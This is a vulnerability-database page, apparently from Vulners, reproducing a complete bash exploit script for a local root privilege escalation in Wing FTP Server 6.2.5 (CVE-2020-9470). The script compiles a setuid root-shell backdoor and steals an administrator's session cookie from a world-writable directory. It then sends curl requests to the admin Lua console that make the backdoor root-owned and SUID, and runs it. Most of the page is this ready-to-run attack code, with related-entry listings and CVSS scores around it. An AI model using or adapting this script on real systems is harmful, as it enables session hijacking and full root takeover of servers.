Vulners
Lucene search
Wing FTP Server 6.2.5 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for CVE-2025-4517 | 15 Feb 202622:09 | – | githubexploit |
| Exploit for Incorrect Permission Assignment for Critical Resource in Wftpserver Wing_Ftp_Server | 25 Dec 202001:53 | – | githubexploit |
| Exploit for CVE-2025-4517 | 18 Feb 202621:08 | – | githubexploit |
 | Wing FTP Server Local Elevation of Privilege Vulnerability | 9 Mar 202000:00 | – | cnvd |
 | CVE-2020-9470 | 7 Mar 202000:20 | – | cve |
 | CVE-2020-9470 | 7 Mar 202000:20 | – | cvelist |
 | EUVD-2020-30289 | 7 Oct 202500:30 | – | euvd |
 | Wing FTP Server 6.2.5 - Privilege Escalation | 2 Mar 202000:00 | – | exploitpack |
 | CVE-2020-9470 | 7 Mar 202001:15 | – | nvd |
 | CVE-2020-9470 | 7 Mar 202001:15 | – | osv |
10
# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
# Google Dork: intitle:"Wing FTP Server - Web"
# Date: 2020-03-03
# Exploit Author: Cary Hooper
# Vendor Homepage: https://www.wftpserver.com
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
# Version: v6.2.5 and prior
# Tested on: Ubuntu 18.04
# CVE: N/A
# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
# https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)
#!/bin/bash
echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
echo 'Exploit by Cary Hooper (@nopantrootdance)'
function writeBackdoor() {
#this function creates a backdoor program (executes bash)
echo " Writing backdoor in $1"
echo '#include <stdio.h>' > $1/foobarh00p.c
echo '#include <sys/types.h>' >> $1/foobarh00p.c
echo '#include <unistd.h>' >> $1/foobarh00p.c
echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
gcc -w $1/foobarh00p.c -o $1/foobarh00p
}
function makeRequest() {
#Executes Lua command in admin panel to set the suid bit/chown on our backdoor
#Change owner to root
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
#Make SUID
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null
}
directories=( "/tmp" "/var/tmp" "/dev/shm" )
for dir in "${directories[@]}"
do
#Check if directories are writeable
if [ -w $dir ]
then
echo "[!] Writeable directory found: $dir"
export backdoordir=$dir
break
else
echo " $dir is not writeable..."; fi
done
writeBackdoor $backdoordir
#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
echo " Finding the wftpserver directory"
export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found. Consider looking manually."; exit 1; fi
#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary. Change the variable below and comment out the code above.
#export sessiondir="/opt/wftpserver/session_admin"
#While loop to wait for an admin session to be established.
echo " Waiting for a Wing FTP admin to log in. This may take a while..."
count=0
while : ; do
if [ "$(ls -A $sessiondir)" ]; then
#If a session file exists, the UID_ADMIN cookie is the name of the file.
echo "[!] An administrator logged in... stealing their session."
export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
echo " Changing IP restrictions on the cookie..."
cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
rm $backdoordir/$cookie.lua
echo "[!] Successfully stole session."
#Once found, make the malicious curl request
export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)
echo " Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
makeRequest $cookie $urldir
break
else
#Checks every 10 seconds. Outputs date to terminal for user feedback purposes only.
sleep 10
let "count+=1"
if [ $count -eq 10 ]; then date; fi
echo "..."
fi
done
#Check if backdoor was created correctly
if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo " Something went wrong. Backdoor is not SUID"; exit 1; fi
if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo " Something went wrong. Backdoor is not owned by root"; exit 1; fi
echo " Backdoor is now SUID owned by root."
echo "[!] Executing backdoor. Cross your fingers..."
#Execute the backdoor... root!
$backdoordir/foobarh00pData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2020 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 26.9
CVSS 3.17.8
EPSS0.0191